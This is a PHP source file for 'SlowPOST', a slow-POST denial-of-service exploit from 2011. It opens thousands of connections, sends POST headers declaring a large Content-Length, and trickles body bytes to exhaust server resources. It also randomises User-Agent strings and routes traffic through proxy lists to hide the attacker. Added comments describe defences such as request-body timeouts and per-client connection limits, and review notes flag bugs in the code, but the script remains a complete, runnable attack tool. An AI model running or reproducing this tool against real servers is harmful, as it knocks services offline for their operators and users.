- <?php
- /**
- * Exploit Title: SlowPOST.php - POST Denial-Of-Service [v0.8.2]
- *
- * Date: 18.05.2011
- * Author: NewEraCracker
- * License: Public Domain
- *
- * How to run:
- * Step 1: Open command line
- * Step 2: php SlowPOST.php
- *
- * This exploit might expose your IP Address in server logs. Be aware.
- * Obviously, using a list of SOCKS5 is a good idea so... #infodox
- */
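//-------------------------
// INiT
//-------------------------

// The CLI SAPI normally predefines STDIN; open it by hand only when it is
// missing, so readSTDIN() always has a handle to read from.
if (!defined("STDIN")) {
    define("STDIN", fopen('php://stdin', 'r'));
}

// Version string printed under the start-up banner.
if (!defined("EXPLOIT_VERSION")) {
    define("EXPLOIT_VERSION", "v0.8.2");
}

// Refuse to run under any SAPI other than the command line.
if (PHP_SAPI !== 'cli') {
    // Inside double quotes \' is not an escape sequence, so the original
    // literal printed a stray backslash ("isn\'t"); use a plain apostrophe.
    echo "This script isn't meant to be ran via browser";
    exit(1);
}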
//-------------------------
// FUNCTiONS
//-------------------------

/**
 * Tells whether $url begins with the literal, case-sensitive prefix "http://".
 *
 * Only the prefix is inspected; nothing after it is validated.
 *
 * @param string $url Candidate URL.
 * @return bool True when the prefix is present at offset 0, false otherwise.
 */
function isValidTango($url)
{
    return strpos($url, 'http://') === 0;
}
/**
 * Reads one line from standard input with trailing whitespace removed.
 *
 * @return string|false The line, or false when the STDIN handle is unusable.
 */
function readSTDIN()
{
    $handle = STDIN;
    if (!$handle) {
        return false;
    }

    $line = fgets($handle);

    return rtrim($line);
}
/**
 * Splits a "scheme://host[:port][/path]" string into host, port and path.
 *
 * No validation is performed: the input is cut on "/" and ":" only. The port
 * is the integer 80 when absent, otherwise the text found after the colon.
 *
 * @param string $url URL to split.
 * @return array array('host' => ..., 'port' => ..., 'path' => ...); the path
 *               carries no leading slash and is "" when the URL has none.
 */
function getParamsFromUrl($url)
{
    // "http://host:port/a/b" becomes ['http:', '', 'host:port', 'a/b'].
    $segments  = explode('/', $url, 4);
    $authority = explode(':', $segments[2], 2);

    return array(
        'host' => $authority[0],
        'port' => isset($authority[1]) ? $authority[1] : 80,
        'path' => isset($segments[3]) ? $segments[3] : "",
    );
}
/**
 * Reads a proxy-list file and returns one randomly chosen entry.
 *
 * Every line is cut on ":"; the text before the first colon is the host and
 * the text after it, up to the first space or tab, is the port. Lines with
 * no colon are dropped. Neither value is validated.
 *
 * @param string $file Path to the list; backslashes are turned into "/".
 * @return array|false array('host' => ..., 'port' => ...), or false when the
 *                     file is not readable or yields no entry.
 */
function getRandomProxy($file)
{
    // Normalise Windows-style path separators
    $file = str_replace("\\","/",$file);
    // Test the file
    if( !is_readable($file) ) return false;
    // Get the file with the proxies
    $proxies = file_get_contents($file);
    // Be sure of the line endings
    $proxies = str_replace( array("\r\n","\r"), "\n", $proxies);
    // One list entry per line
    $proxies = explode("\n",$proxies);
    foreach($proxies as $key => $value)
    {
        $proxies[$key] = explode(":",$value);
        if( isset($proxies[$key][0]) && isset($proxies[$key][1]) )
        {
            // This allows me to get proxies from lists like
            // IP:PORT bla bla bla
            $proxies[$key][1] = explode(" ",$proxies[$key][1]);
            $proxies[$key][1] = explode("\t",$proxies[$key][1][0]);
            $proxies[$key][1] = $proxies[$key][1][0];
            // The proxy
            $proxies[$key] = array('host' => $proxies[$key][0], 'port' => $proxies[$key][1]);
        }
        else
        {
            // No colon on this line: discard it (this leaves a gap in the keys)
            unset($proxies[$key]);
        }
    }
    unset($key,$value);
    // Give a random proxy
    $proxy = null;
    if( count($proxies) )
    {
        // Keys may have gaps after the unset() above, so a drawn index can be
        // missing; redraw until an existing one is hit.
        // NOTE(review): the draw range is 0..count-1, not the surviving keys,
        // so an entry whose key is >= count can never be returned.
        while( !$proxy )
        {
            $rand = mt_rand(0,count($proxies)-1);
            $proxy = (isset($proxies[$rand]) ? $proxies[$rand] : null);
        }
    }
    // Nothing usable in the file
    if( !$proxy )
        return false;
    else
    {
        return $proxy;
    }
}
/**
 * Assembles a User-Agent string from small hard-coded lists.
 *
 * A coin flip (mt_rand(0,1)) selects an Internet Explorer style string or a
 * Firefox style string; the Windows NT version is drawn from 5.0, 5.1, 6.0
 * and 6.1 in both cases.
 *
 * Defender note: the value is picked afresh on every call, so grouping or
 * rate-limiting requests by User-Agent will not tie these connections
 * together; source address and request timing are the more dependable keys.
 *
 * @return string The generated User-Agent header value.
 */
function randomUserAgent()
{
    // Microsoft Windows versions
    $os = array("5.0","5.1","6.0","6.1");
    // Select a random windows
    $os = $os [ mt_rand(0,count($os)-1) ];
    // Select a random browser
    if( mt_rand(0,1) )
    {
        // Internet Explorer versions: [Mozilla version, MSIE version]
        $ua[0] = array("4.0","7.0");
        $ua[1] = array("4.0","8.0");
        $ua[2] = array("5.0","9.0");
        // Random IE
        $ua = $ua [ mt_rand(0,count($ua)-1) ];
        // The Trident token repeats the Mozilla version (4.0 or 5.0)
        return "Mozilla/{$ua[0]} (compatible; MSIE {$ua[1]}; Windows NT {$os}; Trident/{$ua[0]})";
    }
    else
    {
        // Mozilla Firefox languages
        $lang = array("en-GB","en-US","es-ES","pt-BR","pt-PT","sv-SE");
        // Mozilla Firefox versions: [rv, Gecko build date, Firefox version]
        $ua[0] = array("1.9.2.16","20110319","3.6.16");
        $ua[1] = array("1.9.2.17","20110420","3.6.17");
        // Random FF
        $ua = $ua [ mt_rand(0,count($ua)-1) ];
        $lang = $lang [ mt_rand(0,count($lang)-1) ];
        return "Mozilla/5.0 (Windows; U; Windows NT {$os}; {$lang}; rv:{$ua[0]}) Gecko/{$ua[1]} Firefox/{$ua[2]}";
    }
}
/**
 * Opens a TCP connection with a one-second connect timeout and switches the
 * stream to non-blocking mode.
 *
 * Connection warnings are suppressed; failure is reported by the return value.
 *
 * @param string     $host Host to connect to.
 * @param int|string $port Port to connect to.
 * @return resource|false The stream, or false when the connection failed.
 */
function openCustomSocket($host, $port)
{
    $socket = @fsockopen($host, $port, $errno, $errstr, 1);

    if ($socket) {
        stream_set_blocking($socket, 0);
        return $socket;
    }

    return false;
}
/**
 * Writes the header section of an HTTP/1.1 POST to $sock and stops there.
 *
 * The declared Content-Length is a random value between 1337 and 31337 and
 * no body bytes are written here, so the receiving server is left waiting
 * for a body.
 *
 * Defender note: what marks this request is a complete header block followed
 * by a body that arrives far more slowly than the Content-Length implies.
 * Request-body read timeouts or minimum data rates (for example Apache
 * mod_reqtimeout's RequestReadTimeout or nginx's client_body_timeout) and
 * per-client connection limits address it. The header values make a poor
 * signature because several of them are randomised below.
 *
 * @param resource|false $sock Stream from openCustomSocket(), or false.
 * @param string         $host Target host, used for Host and Referer.
 * @param int|string     $port Target port; appended to $host unless it is 80.
 * @param string         $path Request path without the leading slash.
 * @return int|false The declared Content-Length, or false when $sock is falsy.
 */
function slowPostStart($sock,$host,$port,$path)
{
    // Check the socket
    if($sock)
    {
        // To fix Host header
        $host = ($port==80) ? $host : $host.":".$port;
        // Generate a random Content-Length
        $length = mt_rand(1337,31337);
        // Build the request line and headers; the blank line ends the header block
        $out = "POST /{$path} HTTP/1.1\r\n";
        $out .= "Host: {$host}\r\n";
        $out .= "User-Agent: ".randomUserAgent()."\r\n";
        $out .= "Accept: */*\r\n";
        $out .= "Accept-Encoding: gzip,deflate\r\n";
        $out .= "Keep-Alive: ".mt_rand(60,120)."\r\n";
        $out .= "Connection: Keep-Alive\r\n";
        $out .= "Content-Type: application/x-www-form-urlencoded; charset=UTF-8\r\n";
        // Referer is present on roughly half of the requests
        $out .= mt_rand(0,1) ? "Referer: http://{$host}/\r\n" : "";
        $out .= "Content-Length: {$length}\r\n";
        $out .= "\r\n";
        // The write result is suppressed and not checked, so $length is
        // returned even when nothing was sent
        @fwrite($sock, $out);
        return $length;
    }
    else
    {
        return false;
    }
}
/**
 * Writes a small piece of request body to a connection started by
 * slowPostStart().
 *
 * @param resource|false $sock  Stream from openCustomSocket(), or false.
 * @param int            $bytes Requested number of random characters; reset
 *                              to 5 when the value is not integer-valued.
 * @return bool True when $sock is truthy (the write result is not checked),
 *              false otherwise.
 */
function slowPostContinue($sock,$bytes=5)
{
    // Check the $bytes
    if( intval($bytes) != $bytes ) $bytes=5;
    // Check the socket
    if($sock)
    {
        $out = "";
        // NOTE(review): the ";" after the for header ends the statement, so
        // the loop body is empty and the braces below run exactly once: one
        // random printable ASCII character (33-126) is produced whatever
        // $bytes is.
        for($j=0;$j<$bytes;$j++);
        {
            $out .= chr(mt_rand(33,126));
        }
        // urlencode() may expand that character into a three-byte %XX sequence
        $out = urlencode($out);
        @fwrite($sock, $out);
        return true;
    }
    else
        return false;
}
//-------------------------
// MAiN CODE
//-------------------------

// Start-up banner followed by the version line; purely cosmetic.
// NOTE(review): the leading whitespace of the ASCII art appears to have been
// collapsed in this copy, so the banner no longer lines up.
echo "
_______. __ ______ ____ __ ____
/ || | / __ \ \ \ / \ / /
| (----`| | | | | | \ \/ \/ /
\ \ | | | | | | \ /
.----) | | `----.| `--' | \ /\ /
|_______/ |_______| \______/ \__/ \__/
.______ ______ _______.___________.
| _ \ / __ \ / | |
| |_) | | | | | | (----`---| |----`
| ___/ | | | | \ \ | |
| | | `--' | .----) | | |
| _| \______/ |_______/ |__|
";
echo PHP_EOL.EXPLOIT_VERSION." by NewEraCracker".PHP_EOL;
// Input gathering: the target URL and an optional proxy come from the command
// line (argv[1], argv[2]) or, when no valid URL was given there, from
// interactive prompts on STDIN.

// argv[1] is the target URL; it is discarded unless it starts with "http://"
$url = null;
if( isset($_SERVER['argv'][1]) )
{
    $url = $_SERVER['argv'][1];
}
if ( !isValidTango($url) ) $url = null;
// Proxy defaults: no proxy host or port, no proxy-list file
$proxy['host'] = null;
$proxy['port'] = null;
$proxy['file'] = false;
// argv[2] is honoured only when a valid URL was given on the command line.
// It is read either as "host:port" or as the path of a proxy-list file.
if( !empty($url) && isset($_SERVER['argv'][2]) )
{
    // The assignment replaces $proxy wholesale, discarding the three defaults
    // set above; explode() returns a non-empty array, so the condition holds.
    // NOTE(review): code further down still reads $proxy['file'] (and, when
    // argv[2] is neither host:port nor a readable file, 'host' and 'port'),
    // which are then undefined keys.
    if( $proxy = explode(":",$_SERVER['argv'][2]) )
    {
        if( isset($proxy[0]) && isset($proxy[1]) )
        {
            $proxy['host'] = $proxy[0];
            $proxy['port'] = $proxy[1];
            unset($proxy[0],$proxy[1]);
        }
    }
    // No host:port pair found: treat argv[2] as a file name if it is readable
    if( !( isset($proxy['host']) && isset($proxy['port']) ) && is_readable($_SERVER['argv'][2]) )
    {
        $proxy['file'] = true;
        $proxy['filename'] = $_SERVER['argv'][2];
    }
}
// Interactive proxy prompt, reached only when no valid URL came from argv
if( empty($url) && ( empty($proxy['host']) || empty($proxy['port']) ) && !$proxy['file'] )
{
    $proxy['use'] = null;
    // Repeat until the answer starts with y, n or f (case-insensitive)
    while( !$proxy['use'] )
    {
        echo PHP_EOL."Do you want to use a proxy [yes/no/file]: ";
        $proxy['use'] = readSTDIN();
        if( strpos(strtolower($proxy['use']),'y') === 0 )
        {
            // Host and port are taken as typed; they are not validated here
            echo PHP_EOL."Proxy IP: ";
            $proxy['host'] = readSTDIN();
            echo PHP_EOL."Proxy Port: ";
            $proxy['port'] = readSTDIN();
        }
        elseif( strpos(strtolower($proxy['use']),'n') === 0 )
        {
            break;
        }
        elseif( strpos(strtolower($proxy['use']),'f') === 0 )
        {
            echo PHP_EOL."Proxy file: ";
            $proxy['filename'] = readSTDIN();
            if( is_readable($proxy['filename']) )
            {
                $proxy['file'] = true;
            }
            else
            {
                // Unreadable file: clear the answer so the prompt repeats
                echo PHP_EOL."Invalid file!".PHP_EOL;
                $proxy['use'] = null;
            }
        }
        else
        {
            $proxy['use'] = null;
            echo PHP_EOL."Invalid choice!".PHP_EOL;
        }
    }
    unset($proxy['use']);
}
// Prompt for the target until the answer starts with "http://"
while( !$url )
{
    echo PHP_EOL."Target url: ";
    $url = readSTDIN();
    if( isValidTango($url) ) break;
    $url = null;
    echo PHP_EOL."Invalid target!".PHP_EOL;
}
// Connection loop. Each round tries to open up to 5000 connections, sends
// POST headers on each new one, and after every attempt walks all live
// connections to write a small piece of body.
//
// Defender note: the pressure on the server comes from the number of
// simultaneously open, incomplete requests, not from bandwidth. Per-source
// connection limits and request-body read timeouts are the controls that
// bound it; a server sees many long-lived POSTs whose body never completes.

// One-second default socket timeout
@ini_set("default_socket_timeout",1);
// From here on $url is array('host', 'port', 'path')
$url = getParamsFromUrl($url);
// Without a proxy the connection goes straight to the target host and port
$proxy['host'] = (!$proxy['host']) ? $url['host'] : $proxy['host'];
$proxy['port'] = (!$proxy['port']) ? $url['port'] : $proxy['port'];
echo PHP_EOL."IMMA FIRIN MAH LAZOR!".PHP_EOL;
// Runs until the process is stopped
while(true)
{
    // Live connections of this round: index => array('sock', 'length')
    $fp = array();
    // Start
    for($i=0;$i<5000;$i++)
    {
        // Using Proxy file?
        if( $proxy['file'] )
        {
            $filename = $proxy['filename'];
            // $proxy is replaced by array('host', 'port') from the list
            $proxy = getRandomProxy($filename);
            if(!$proxy)
            {
                echo $filename." is not a valid proxy-list file!";
                exit(1);
            }
            // NOTE(review): only 'filename' is restored, not 'file', so this
            // branch is not entered again on later iterations and the proxy
            // drawn here stays in use.
            $proxy['filename'] = $filename;
        }
        // The socket is opened to $proxy, while the request headers name $url
        if( $fp[$i]['sock'] = openCustomSocket($proxy['host'], $proxy['port']) )
        {
            // One "+" per opened connection
            echo '+';
            // Send the headers; $_length is the declared Content-Length
            if( $_length = slowPostStart($fp[$i]['sock'], $url['host'], $url['port'], $url['path']))
            {
                // Remaining-body counter for this connection
                if( !isset($fp[$i]['length']) )
                {
                    $fp[$i]['length'] = $_length;
                }
            }
            else
            {
                // Headers not sent: drop the connection
                @fclose($fp[$i]['sock']);
                unset($fp[$i]);
            }
        }
        else
        {
            // Connect failed: 'sock' is false here, fclose() is suppressed
            @fclose($fp[$i]['sock']);
            unset($fp[$i]);
        }
        // Service every live connection once per connection attempt
        foreach($fp as $_k => $_v)
        {
            if($fp[$_k]['length'] > 0)
            {
                // The counter falls by up to 5 per pass, independent of how
                // many bytes slowPostContinue() actually writes
                $_length = ($fp[$_k]['length'] < 5) ? $fp[$_k]['length'] : 5;
                slowPostContinue($fp[$_k]['sock'],$_length);
                $fp[$_k]['length'] = $fp[$_k]['length']-$_length;
            }
            else
            {
                // Counter exhausted: close the connection
                @fclose($fp[$_k]['sock']);
                unset($fp[$_k]);
            }
        }
        unset($_k,$_v);
    }
    // End of round: close whatever is still open, then start over
    foreach($fp as $_k => $_v)
    {
        @fclose($fp[$_k]['sock']);
    }
}